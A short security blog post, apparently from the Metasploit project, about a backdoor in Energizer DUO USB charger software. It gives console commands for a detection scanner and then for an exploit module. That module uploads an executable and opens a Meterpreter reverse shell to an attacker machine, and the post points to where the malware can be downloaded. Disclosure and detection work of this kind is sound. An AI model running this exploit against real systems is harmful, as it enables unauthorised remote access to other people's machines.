The newsophere was abuzz this morning with the discovery that Energizer's "DUO" USB Battery Charger included a malicious backdoor in the accompanying software. This backdoor was only discovered after the product was discontinued, leading some to believe that it went through its entire lifecycle undetected. The good news is that the backdoor is relatively harmless; machines behind the corporate firewall, or those with a local firewall installed, should prevent access to the listener on port 7777. The backdoor makes no outbound connections and uninstalling the USB Charger software package clears the system.
As of this afternoon, you can now use Metasploit to locate infected systems on the local network. After downloading a copy of Metasploit and updating it to revision 8749 or newer, the following commands can be used to scan the local network:
$ msfconsole msf > use auxiliary/scanner/backdoor/energizer_duo_detect msf auxiliary(energizer_duo_detect) > set RHOSTS 192.168.0.0/24 msf auxiliary(energizer_duo_detect) > set THREADS 256 msf auxiliary(energizer_duo_detect) > run [*] 192.168.0.132:7777 FOUND: [["F", "AUTOEXEC.BAT"]...
To take things a step further and gain access to a system running this backdoor, use the energizer_duo_payload module:
msf > use exploit/windows/backdoor/energizer_duo_payload msf exploit(energizer_duo_payload) > set RHOST 192.168.0.132 msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(energizer_duo_payload) > set LHOST 192.168.0.228 msf exploit(energizer_duo_payload) > exploit [*] Started reverse handler on 192.168.0.228:4444 [*] Trying to upload C:\NTL0ZTL4DhVL.exe... [*] Trying to execute C:\NTL0ZTL4DhVL.exe... [*] Sending stage (747008 bytes) [*] Meterpreter session 1 opened (192.168.0.228:4444 -> 192.168.0.132:1200) meterpreter > getuid Server username: XPDEV\Developer
A copy of the malware can be obtained from the Wayback Machine